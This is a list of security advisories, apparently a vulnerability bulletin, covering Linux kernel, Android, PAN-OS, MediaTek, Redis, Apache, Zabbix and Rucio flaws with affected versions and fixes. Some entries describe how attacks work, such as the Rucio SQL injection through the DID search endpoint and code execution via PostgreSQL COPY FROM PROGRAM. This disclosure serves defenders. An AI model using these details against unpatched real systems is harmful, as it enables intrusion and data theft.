| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leaks on common probe Make sure to drop the reference taken when looking up the SMI device during common probe on late probe failure (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2025-71288 | https://git.kernel.org/stable/c/b8b2cf42b94c0a8efe43279643935256a6f58b9f https://git.kernel.org/stable/c/b16599fedf49fd42d174fba342a0b56103df3169 https://git.kernel.org/stable/c/984992f31cfb71b25cd0a72ef51ceb5dd6f187e8 https://git.kernel.org/stable/c/b44d090d6ca159d94b59ad4cc44ffdaca094df82 https://git.kernel.org/stable/c/9704564a70399c2787f5a7c5d347add721056e9d https://git.kernel.org/stable/c/6cfa038bddd710f544076ea2ef7792fc82fbedd6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: handle attr_set_size() errors when truncating files If attr_set_size() fails while truncating down, the error is silently ignored and the inode may be left in an inconsistent state. | 2026-05-06 | not yet calculated | CVE-2025-71289 | https://git.kernel.org/stable/c/6dfea43d11513b7f2892529de55e8f0855108a2c https://git.kernel.org/stable/c/576248a34b927e93b2fd3fff7df735ba73ad7d01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ti_fpc202: fix a potential memory leak in probe function Use for_each_child_of_node_scoped() to simplify the code and ensure the device node reference is automatically released when the loop scope ends. | 2026-05-06 | not yet calculated | CVE-2025-71290 | https://git.kernel.org/stable/c/d2975604bf1ba36ffc5a08fe8da97fd63b91c4f1 https://git.kernel.org/stable/c/dd16f314cb10e6807c74402efdfa2cccc1f15907 https://git.kernel.org/stable/c/dad9f13d967b4e53e8eaf5f9c690f8e778ad9802 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read() In the function bcm_vk_read(), the pointer entry is checked, indicating that it can be NULL. If entry is NULL and rc is set to -EMSGSIZE, the following code may cause null-pointer dereferences: struct vk_msg_blk tmp_msg = entry->to_h_msg[0]; set_msg_id(&tmp_msg, entry->usr_msg_id); tmp_msg.size = entry->to_h_blks - 1; To prevent these possible null-pointer dereferences, copy to_h_msg, usr_msg_id, and to_h_blks from iter into temporary variables, and return these temporary variables to the application instead of accessing them through a potentially NULL entry. | 2026-05-06 | not yet calculated | CVE-2025-71291 | https://git.kernel.org/stable/c/741c5a3a0cd893a4218fc0fc8c18403e54fcfb22 https://git.kernel.org/stable/c/ece3722169ba93734bfd1f06255e8ab7f19fe964 https://git.kernel.org/stable/c/aa97ccc3dc1eba9f4537f0410e9dbb0b05ccf2fb https://git.kernel.org/stable/c/3842f93e6e29d5cc1dcb9e5bda70587b444bed69 https://git.kernel.org/stable/c/20f2d9dbe5e972516f8f9948d7ae5b95d1ad77bd https://git.kernel.org/stable/c/ba75ecb97d3f4e95d59002c13afb6519205be6cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: nlink overflow in jfs_rename If nlink is maximal for a directory (-1) and inside that directory you perform a rename for some child directory (not moving from the parent), then the nlink of the first directory is first incremented and later decremented. Normally this is fine, but when nlink = -1 this causes a wrap around to 0, and then drop_nlink issues a warning. After applying the patch syzbot no longer issues any warnings. I also ran some basic fs tests to look for any regressions. | 2026-05-06 | not yet calculated | CVE-2025-71292 | https://git.kernel.org/stable/c/2108829a59f081e822fdab8c2cd7131deb8aa8a1 https://git.kernel.org/stable/c/b4330a0d0947fbdc9d445cbbeabd8cc910a8c9ca https://git.kernel.org/stable/c/a3d66089e50a6e0142f8884471f74292102ea9aa https://git.kernel.org/stable/c/f70fcbc2ac7c24f087a2c895c5753aa730b1e479 https://git.kernel.org/stable/c/5d77c36cd4b698649f5c30c5f6c084f4f61d1880 https://git.kernel.org/stable/c/fe136426e30ca6debcf916fd6a141555ed9fde74 https://git.kernel.org/stable/c/93c325746ae59709b4f9bad4e3e4761c8d566c70 https://git.kernel.org/stable/c/9218dc26fd922b09858ecd3666ed57dfd8098da8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/ras: Move ras data alloc before bad page check In the rare event that the eeprom has only invalid address entries, allocation is skipped, which causes the following NULL pointer issue: [ 547.103445] BUG: kernel NULL pointer dereference, address: 0000000000000010 [ 547.118897] #PF: supervisor read access in kernel mode [ 547.130292] #PF: error_code(0x0000) - not-present page [ 547.141689] PGD 124757067 P4D 0 [ 547.148842] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 547.158504] CPU: 49 PID: 8167 Comm: cat Tainted: G OE 6.8.0-38-generic #38-Ubuntu [ 547.177998] Hardware name: Supermicro AS -8126GS-TNMR/H14DSG-OD, BIOS 1.7 09/12/2025 [ 547.195178] RIP: 0010:amdgpu_ras_sysfs_badpages_read+0x2f2/0x5d0 [amdgpu] [ 547.210375] Code: e8 63 78 82 c0 45 31 d2 45 3b 75 08 48 8b 45 a0 73 44 44 89 f1 48 8b 7d 88 48 89 ca 48 c1 e2 05 48 29 ca 49 8b 4d 00 48 01 d1 <48> 83 79 10 00 74 17 49 63 f2 48 8b 49 08 41 83 c2 01 48 8d 34 76 [ 547.252045] RSP: 0018:ffa0000067287ac0 EFLAGS: 00010246 [ 547.263636] RAX: ff11000167c28130 RBX: ff11000127600000 RCX: 0000000000000000 [ 547.279467] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ff11000125b1c800 [ 547.295298] RBP: ffa0000067287b50 R08: 0000000000000000 R09: 0000000000000000 [ 547.311129] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 [ 547.326959] R13: ff11000217b1de00 R14: 0000000000000000 R15: 0000000000000092 [ 547.342790] FS: 0000746e59d14740(0000) GS:ff11017dfda80000(0000) knlGS:0000000000000000 [ 547.360744] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 547.373489] CR2: 0000000000000010 CR3: 000000019585e001 CR4: 0000000000f71ef0 [ 547.389321] PKRU: 55555554 [ 547.395316] Call Trace: [ 547.400737] <TASK> [ 547.405386] ? show_regs+0x6d/0x80 [ 547.412929] ? __die+0x24/0x80 [ 547.419697] ? page_fault_oops+0x99/0x1b0 [ 547.428588] ? do_user_addr_fault+0x2ee/0x6b0 [ 547.438249] ? exc_page_fault+0x83/0x1b0 [ 547.446949] ? asm_exc_page_fault+0x27/0x30 [ 547.456225] ? amdgpu_ras_sysfs_badpages_read+0x2f2/0x5d0 [amdgpu] [ 547.470040] ? mas_wr_modify+0xcd/0x140 [ 547.478548] sysfs_kf_bin_read+0x63/0xb0 [ 547.487248] kernfs_file_read_iter+0xa1/0x190 [ 547.496909] kernfs_fop_read_iter+0x25/0x40 [ 547.506182] vfs_read+0x255/0x390 This also results in the space-left value being assigned negative values. Moving the data alloc call before the bad page check resolves both issues. | 2026-05-06 | not yet calculated | CVE-2025-71293 | https://git.kernel.org/stable/c/0b7f78caeffa51a1afa521c284e863ec3b5a36df https://git.kernel.org/stable/c/5c685235b60459381e959109b416a63db4d8dbac https://git.kernel.org/stable/c/bd68a1404b6fa2e7e9957b38ba22616faba43e75 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix NULL pointer issue buffer funcs If the SDMA block is not enabled, buffer_funcs will not be initialized; fix the null pointer issue when buffer_funcs is not initialized. | 2026-05-06 | not yet calculated | CVE-2025-71294 | https://git.kernel.org/stable/c/29fd416e0e08aa6d5a97fd313749d08d83de0826 https://git.kernel.org/stable/c/276028fd9b60bbcc68796d1124b6b58298f4ca8a https://git.kernel.org/stable/c/3e849a93bff40f0c88a8aafba062b1de0ec2797b https://git.kernel.org/stable/c/9877a865d62c9c3e0f4cc369dc9ca9f7f24f5ee9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/buffer: add alert in try_to_free_buffers() for folios without buffers try_to_free_buffers() can be called on folios with no buffers attached when filemap_release_folio() is invoked on a folio belonging to a mapping with AS_RELEASE_ALWAYS set but no release_folio operation defined. In such cases, folio_needs_release() returns true because of the AS_RELEASE_ALWAYS flag, but the folio has no private buffer data. This causes try_to_free_buffers() to call drop_buffers() on a folio with no buffers, leading to a null pointer dereference. Add a check in try_to_free_buffers() to return early if the folio has no buffers attached, with WARN_ON_ONCE() to alert about the misconfiguration. This provides defensive hardening. | 2026-05-06 | not yet calculated | CVE-2025-71295 | https://git.kernel.org/stable/c/1b111a69a6e33a922622bf9870e4e63fb2b649c8 https://git.kernel.org/stable/c/c1b6227555c52781178132b7a06466711855795c https://git.kernel.org/stable/c/727e5140e0cf83b4ce6a11b89bb73bff5d96f8f3 https://git.kernel.org/stable/c/42c32d7571ccd8ef32351cac506f00b0fae99fd2 https://git.kernel.org/stable/c/c6246ca15999053d2632fbcc7b86e6eef7f077cb https://git.kernel.org/stable/c/b68f91ef3b3fe82ad78c417de71b675699a8467c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around purge Acquire and release the GEM object's reservation lock around calls to the object's purge operation. The tests use drm_gem_shmem_purge_locked(), which led to errors such as show below. [ 58.709128] WARNING: CPU: 1 PID: 1354 at drivers/gpu/drm/drm_gem_shmem_helper.c:515 drm_gem_shmem_purge_locked+0x51c/0x740 Only export the new helper drm_gem_shmem_purge() for Kunit tests. This is not an interface for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71296 | https://git.kernel.org/stable/c/cdf8bbbd9017adcfb91ad9a902198d4b507719a9 https://git.kernel.org/stable/c/8baeee2c1c0cdb3a8eac3b8f38156cce6ee1a69f https://git.kernel.org/stable/c/3f41307d589c2f25d556d47b165df808124cd0c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: 8822b: Avoid WARNING in rtw8822b_config_trx_mode() rtw8822b_set_antenna() can be called from userspace when the chip is powered off. In that case a WARNING is triggered in rtw8822b_config_trx_mode() because trying to read the RF registers when the chip is powered off returns an unexpected value. Call rtw8822b_config_trx_mode() in rtw8822b_set_antenna() only when the chip is powered on. ------------[ cut here ]------------ write RF mode table fail WARNING: CPU: 0 PID: 7183 at rtw8822b.c:824 rtw8822b_config_trx_mode.constprop.0+0x835/0x840 [rtw88_8822b] CPU: 0 UID: 0 PID: 7183 Comm: iw Tainted: G W OE 6.17.5-arch1-1 #1 PREEMPT(full) 01c39fc421df2af799dd5e9180b572af860b40c1 Tainted: [W]=WARN, [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: LENOVO 82KR/LNVNB161216, BIOS HBCN18WW 08/27/2021 RIP: 0010:rtw8822b_config_trx_mode.constprop.0+0x835/0x840 [rtw88_8822b] Call Trace: <TASK> rtw8822b_set_antenna+0x57/0x70 [rtw88_8822b 370206f42e5890d8d5f48eb358b759efa37c422b] rtw_ops_set_antenna+0x50/0x80 [rtw88_core 711c8fb4f686162be4625b1d0b8e8c6a5ac850fb] ieee80211_set_antenna+0x60/0x100 [mac80211 f1845d85d2ecacf3b71867635a050ece90486cf3] nl80211_set_wiphy+0x384/0xe00 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? netdev_run_todo+0x63/0x550 genl_family_rcv_msg_doit+0xfc/0x160 genl_rcv_msg+0x1aa/0x2b0 ? __pfx_nl80211_pre_doit+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_nl80211_set_wiphy+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_nl80211_post_doit+0x10/0x10 [cfg80211 296485ee85696d2150309a6d21a7fbca83d3dbda] ? __pfx_genl_rcv_msg+0x10/0x10 netlink_rcv_skb+0x59/0x110 genl_rcv+0x28/0x40 netlink_unicast+0x285/0x3c0 ? __alloc_skb+0xdb/0x1a0 netlink_sendmsg+0x20d/0x430 ____sys_sendmsg+0x39f/0x3d0 ? import_iovec+0x2f/0x40 ___sys_sendmsg+0x99/0xe0 ? refill_obj_stock+0x12e/0x240 __sys_sendmsg+0x8a/0xf0 do_syscall_64+0x81/0x970 ? do_syscall_64+0x81/0x970 ? ksys_read+0x73/0xf0 ? do_syscall_64+0x81/0x970 ? count_memcg_events+0xc2/0x190 ? handle_mm_fault+0x1d7/0x2d0 ? do_user_addr_fault+0x21a/0x690 ? exc_page_fault+0x7e/0x1a0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> ---[ end trace 0000000000000000 ]--- | 2026-05-08 | not yet calculated | CVE-2025-71297 | https://git.kernel.org/stable/c/7852ca1cc65ad43fb8b620e6a65d5cb15e4e4487 https://git.kernel.org/stable/c/a96d161cfdb11cd2c35d5e498b93431164823338 https://git.kernel.org/stable/c/0d0c2fb80ca4c284c397dd7546743a3b5fdf4020 https://git.kernel.org/stable/c/509becaee5680a39bde00c2c7d448dfeb39a8e05 https://git.kernel.org/stable/c/44510ff07b5198e4a835a3074b716cec8357695b https://git.kernel.org/stable/c/44d1f624bbdd2d60319374ba85f7195a28d00c90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around madvise Acquire and release the GEM object's reservation lock around calls to the object's madvise operation. The tests use drm_gem_shmem_madvise_locked(), which led to errors such as shown below. [ 58.339389] WARNING: CPU: 1 PID: 1352 at drivers/gpu/drm/drm_gem_shmem_helper.c:499 drm_gem_shmem_madvise_locked+0xde/0x140 Only export the new helper drm_gem_shmem_madvise() for Kunit tests. This is not an interface for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71298 | https://git.kernel.org/stable/c/9cc77691b5fd615625955cedf726da57543088f1 https://git.kernel.org/stable/c/07cfcab370da06f26c273306571cbb0bfa3b9c52 https://git.kernel.org/stable/c/607d07d8cc0b835a8701259f08a03dc149b79b4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsing The recent refactoring of where runtime PM is enabled, done in commit f1eb4e792bb1 ("spi: spi-cadence-quadspi: Enable pm runtime earlier to avoid imbalance"), meant that when we do a pm_runtime_disable() in the error paths of probe() we can trigger a runtime disable which in turn results in duplicate clock disables. This is particularly likely to happen when there is a missing or broken DT description for the flashes attached to the controller. Early on in the probe function we do a pm_runtime_get_noresume() since the probe function leaves the device in a powered up state, but in the error path we can't assume that PM is enabled so we also manually disable everything, including clocks. This means that when runtime PM is active both it and the probe function release the same reference to the main clock for the IP, triggering warnings from the clock subsystem: [ 8.693719] clk:75:7 already disabled [ 8.693791] WARNING: CPU: 1 PID: 185 at /usr/src/kernel/drivers/clk/clk.c:1188 clk_core_disable+0xa0/0xb ... [ 8.694261] clk_core_disable+0xa0/0xb4 (P) [ 8.694272] clk_disable+0x38/0x60 [ 8.694283] cqspi_probe+0x7c8/0xc5c [spi_cadence_quadspi] [ 8.694309] platform_probe+0x5c/0xa4 Dealing with this issue properly is complicated by the fact that we don't know if runtime PM is active, so we can't tell if it will disable the clocks or not. We can, however, sidestep the issue for the flash descriptions by moving their parsing to when we parse the controller properties, which also saves us doing a bunch of setup which can never be used, so let's do that. | 2026-05-08 | not yet calculated | CVE-2025-71299 | https://git.kernel.org/stable/c/08dca4c8099a41a9fa3be128a793387603f73a17 https://git.kernel.org/stable/c/dcaa104ad9c860a6dbd5797919e0ec0b1cd5a57a https://git.kernel.org/stable/c/9f0736a4e136a6eb61e0cf530ddc18ab6d816ba3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "arm64: zynqmp: Add an OP-TEE node to the device tree" This reverts commit 06d22ed6b6635b17551f386b50bb5aaff9b75fbe. OP-TEE logic in U-Boot automatically injects a reserved-memory node along with optee firmware node to kernel device tree. The injection logic is dependent on that there is no manually defined optee node. Having the node in zynqmp.dtsi effectively breaks OP-TEE's insertion of the reserved-memory node, causing memory access violations during runtime. | 2026-05-08 | not yet calculated | CVE-2025-71300 | https://git.kernel.org/stable/c/eece81eeda10eb42c687399fb5aa69977ae15664 https://git.kernel.org/stable/c/3983ef126e439900bbf419724a9759863c146660 https://git.kernel.org/stable/c/2a833c730d4e8d1cc10953270ce0f3a156145d81 https://git.kernel.org/stable/c/c197179990124f991fca220d97fac56779a02c6d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tests: shmem: Hold reservation lock around vmap/vunmap Acquire and release the GEM object's reservation lock around vmap and vunmap operations. The tests use vmap_locked, which led to errors such as shown below. [ 122.292030] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:390 drm_gem_shmem_vmap_locked+0x3a3/0x6f0 [ 122.468066] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:293 drm_gem_shmem_pin_locked+0x1fe/0x350 [ 122.563504] WARNING: CPU: 3 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:234 drm_gem_shmem_get_pages_locked+0x23c/0x370 [ 122.662248] WARNING: CPU: 2 PID: 1413 at drivers/gpu/drm/drm_gem_shmem_helper.c:452 drm_gem_shmem_vunmap_locked+0x101/0x330 Only export the new vmap/vunmap helpers for Kunit tests. These are not interfaces for regular drivers. | 2026-05-08 | not yet calculated | CVE-2025-71301 | https://git.kernel.org/stable/c/6b953d92f2f29e74b125617c6f00300fa1bed97e https://git.kernel.org/stable/c/e7b7022f11d3cf281c726117478696b83681bf11 https://git.kernel.org/stable/c/cda83b099f117f2a28a77bf467af934cb39e49cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: fix for dma-fence safe access rules Commit 506aa8b02a8d6 ("dma-fence: Add safe access helpers and document the rules") details the dma-fence safe access rules. The most common culprit is that drm_sched_fence_get_timeline_name may race with group_free_queue. | 2026-05-08 | not yet calculated | CVE-2025-71302 | https://git.kernel.org/stable/c/ab8c0de60f16d7e0b162ccbbb35fcf1f277c97c2 https://git.kernel.org/stable/c/eae60933abd11df013876f647c9edbd35ce67615 https://git.kernel.org/stable/c/efe24898485c5c831e629d9c6fb9350c35cb576f |
| Google--Android | In adbd_tls_verify_cert of auth.cpp, there is a possible bypass of wireless ADB mutual authentication due to a logic error in the code. This could lead to remote (proximal/adjacent) code execution as the shell user with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-05-04 | not yet calculated | CVE-2026-0073 | https://source.android.com/docs/security/bulletin/2026/2026-05-01 |
| Palo Alto Networks--Cloud NGFW | A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. The risk of this issue is greatly reduced if you secure access to the User-ID™ Authentication Portal per the best practice guidelines https://knowledgebase.paloaltonetworks.com/KCSArticleDetail by restricting access to only trusted internal IP addresses. Prisma Access, Cloud NGFW and Panorama appliances are not impacted by this vulnerability. | 2026-05-06 | not yet calculated | CVE-2026-0300 | https://security.paloaltonetworks.com/CVE-2026-0300 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10724073; Issue ID: MSV-6296. | 2026-05-04 | not yet calculated | CVE-2026-20447 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10708513; Issue ID: MSV-6281. | 2026-05-04 | not yet calculated | CVE-2026-20448 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to a heap buffer overflow. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01760138; Issue ID: MSV-6148. | 2026-05-04 | not yet calculated | CVE-2026-20449 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In Modem, there is a possible system crash due to incorrect error handling. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01753620; Issue ID: MSV-6100. | 2026-05-04 | not yet calculated | CVE-2026-20450 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| MediaTek, Inc.--MediaTek chipset | In slbc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10828685; Issue ID: MSV-6504. | 2026-05-04 | not yet calculated | CVE-2026-20451 | https://corp.mediatek.com/product-security-bulletin/May-2026 |
| JohnsonControls--AC2000 | Uncontrolled Search Path Element vulnerability in JohnsonControls AC2000 on Windows allows Leveraging/Manipulating Configuration File Search Paths. This issue affects AC2000: from 10.6 before release 10, from 11.0 before release 9, from 12 before release 3. | 2026-05-06 | not yet calculated | CVE-2026-21661 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories |
| redis--redis | Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command. If a blocked client is evicted during this flow, an authenticated attacker can trigger a use-after-free that may lead to remote code execution. This has been patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-23479 | https://github.com/redis/redis/security/advisories/GHSA-93m2-935m-8rj3 https://github.com/redis/redis/releases/tag/8.6.3 |
| redis--redis | Redis is an in-memory data structure store. In all versions of redis-server with Lua scripting, an authenticated attacker can exploit the master-replica synchronization mechanism to trigger a use-after-free on replicas where replica-read-only is disabled or can be disabled, which may lead to remote code execution. A workaround is to prevent users from executing Lua scripts or avoid using replicas where replica-read-only is disabled. This is patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-23631 | https://github.com/redis/redis/security/advisories/GHSA-8ghh-qpmp-7826 https://github.com/redis/redis/releases/tag/8.6.3 |
| Apache Software Foundation--Apache HTTP Server | Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol. This issue affects Apache HTTP Server: 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-23918 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Zabbix--Zabbix | An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user who opens the tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip. | 2026-05-06 | not yet calculated | CVE-2026-23926 | https://support.zabbix.com/browse/ZBX-27758 |
| Zabbix--Zabbix | A user able to connect to Agent 2 can inject an Oracle TNS connection string via the 'service' parameter. This can lead to Agent 2 connecting to an attacker-controlled server and leaking Oracle database credentials if they are saved in a named session. | 2026-05-06 | not yet calculated | CVE-2026-23927 | https://support.zabbix.com/browse/ZBX-27759 |
| Zabbix--Zabbix | The Item history widget (in Zabbix 7.0+) or the Plain text widget (in Zabbix 6.0) can execute injected JavaScript when HTML display is enabled. This can allow an attacker to perform unauthorized actions depending on which user opens a dashboard containing these widgets. The malicious JavaScript would have to come from a monitored host controlled by the attacker. Note: the Item history widget is a replacement for the Plain text widget since Zabbix 7.0. | 2026-05-06 | not yet calculated | CVE-2026-23928 | https://support.zabbix.com/browse/ZBX-27760 |
| Apache Software Foundation--Apache HTTP Server | An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue. | 2026-05-04 | not yet calculated | CVE-2026-24072 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache CloudStack | Account users are allowed by default to register templates to be downloaded directly to the primary storage for deploying instances using the KVM hypervisor. Due to missing file name sanitization, an attacker can register malicious templates to execute arbitrary code on the KVM hosts. This can result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of the KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2026-25077 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | Instances deployed via the Proxmox extension allow unauthorized access to instances belonging to other tenants. This issue affects Apache CloudStack: from 4.21.0.0 through 4.22.0.0. The Proxmox extension for CloudStack improperly uses a user-editable instance setting, proxmox_vmid, to associate CloudStack instances with Proxmox virtual machines. Because this value is not restricted or validated against tenant ownership and Proxmox VM IDs are predictable, a non-privileged attacker can modify the setting to reference a VM belonging to another account. This allows unauthorized cross-tenant access and enables full control over the targeted VM, including starting, stopping, and destroying the virtual machine. Users are recommended to upgrade to version 4.22.0.1, which fixes this issue. As a workaround for the existing installations, editing of the proxmox_vmid instance detail by users can be prevented by adding this detail name to the global configuration parameter - user.vm.denied.details. | 2026-05-08 | not yet calculated | CVE-2026-25199 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| redis--redis | Redis is an in-memory data structure store. In versions of redis-server up to 8.6.3, the RESTORE command does not properly validate serialized values. An authenticated attacker with permission to execute RESTORE can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This is patched in version 8.6.3. | 2026-05-05 | not yet calculated | CVE-2026-25243 | https://github.com/redis/redis/security/advisories/GHSA-c8h9-259x-jff4 https://github.com/redis/redis/releases/tag/8.6.3 |
| RedisTimeSeries--RedisTimeSeries | RedisTimeSeries is a time-series module for Redis. In all versions before 1.12.14 of RedisTimeSeries, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisTimeSeries module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This has been patched in version 1.12.14. | 2026-05-05 | not yet calculated | CVE-2026-25588 | https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-7jwr-g5qv-w3gw https://github.com/RedisTimeSeries/RedisTimeSeries/releases/tag/v1.12.14 |
| RedisBloom--RedisBloom | RedisBloom is a probabilistic data structures module for Redis. In all versions of RedisBloom before 2.8.20, the module does not properly validate serialized values processed through the Redis RESTORE command. An authenticated attacker with permission to execute RESTORE on a server with the RedisBloom module loaded can supply a crafted serialized payload that triggers invalid memory access and may lead to remote code execution. A workaround is to restrict access to the RESTORE command with ACL rules. This issue is fixed in version 2.8.20. | 2026-05-05 | not yet calculated | CVE-2026-25589 | https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-7862-34pw-44wv https://github.com/RedisBloom/RedisBloom/releases/tag/v2.8.20 |
| Open Notebook--Open Notebook | Improper input validation, together with an overly permissive default CORS configuration, in Open Notebook v1.8.1 allows a remote attacker to trick a legitimate user into altering or deleting arbitrary database entries via a specially crafted malicious URL. Depending on the deployment, data exfiltration is also possible. | 2026-05-07 | not yet calculated | CVE-2026-28201 | https://github.com/lfnovo/open-notebook/security/advisories/GHSA-5wj9-f8q5-8f9c |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in mod_proxy_ajp of Apache HTTP Server. If mod_proxy_ajp connects to a malicious AJP server this AJP server can send a malicious AJP message back to mod_proxy_ajp and cause it to write 4 attacker controlled bytes after the end of a heap based buffer. This issue affects Apache HTTP Server: through 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-28780 | https://httpd.apache.org/security/vulnerabilities_24.html |
| rucio--rucio | A SQL injection vulnerability in `FilterEngine.create_sqla_query()` allows any authenticated Rucio user to execute arbitrary SQL against the backend database through the DID search endpoint (`GET /dids/<scope>/dids/search`). On Oracle deployments attacker-controlled filter keys and values are interpolated directly into `sqlalchemy.text()` via Python `.format()`, completely bypassing parameterization. This enables full database compromise including extraction of authentication tokens, password hashes, and all managed data identifiers. This affects versions 1.27.0 and later before 35.8.5, 38.5.5, 39.4.2, and 40.1.1. The vulnerability exists in `lib/rucio/core/did_meta_plugins/filter_engine.py` within the `create_sqla_query()` method. When the database dialect is Oracle, filter expressions for JSON metadata columns are constructed using `text()` with Python string formatting. Both `key` and `value` are attacker-controlled strings derived from HTTP query parameters. The `text()` function creates a raw SQL fragment - it does **not** escape or parameterize its contents. Any authenticated Rucio user can exploit this through the DID search API to execute arbitrary SQL against the backend database. This can expose all managed data identifiers and sensitive tables such as identities, tokens, accounts, rse_settings, and rules, and may allow modification of database contents. The issue affects Oracle deployments using the default json_meta plugin and does not affect PostgreSQL or MySQL deployments using that plugin. This vulnerability has been fixed in versions 35.8.5, 38.5.5, 39.4.2, and 40.1.1. | 2026-05-06 | not yet calculated | CVE-2026-29080 | https://github.com/rucio/rucio/security/advisories/GHSA-vjr5-c9qv-hgm3 |
| rucio--rucio | A SQL injection vulnerability exists in Rucio versions 1.30.0 and later before 35.8.5, 38.5.5, 39.4.2, and 40.1.1, in `FilterEngine.create_postgres_query()`. This allows any authenticated Rucio user to execute arbitrary SQL against the PostgreSQL metadata database through the DID search endpoint (`GET /dids/<scope>/dids/search`). When the `postgres_meta` metadata plugin is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL strings via Python `.format()`, then passed to `psycopg3`'s `sql.SQL()` which treats the string as trusted SQL syntax. Depending on the database privileges assigned to the service account, exploitation can expose sensitive tables, modify or delete metadata, access server-side files, or achieve code execution through PostgreSQL features such as COPY ... FROM PROGRAM. This issue affects deployments that explicitly use the postgres_meta metadata plugin. This vulnerability has been fixed in versions 35.8.5, 38.5.5, 39.4.2, and 40.1.1. | 2026-05-06 | not yet calculated | CVE-2026-29090 | 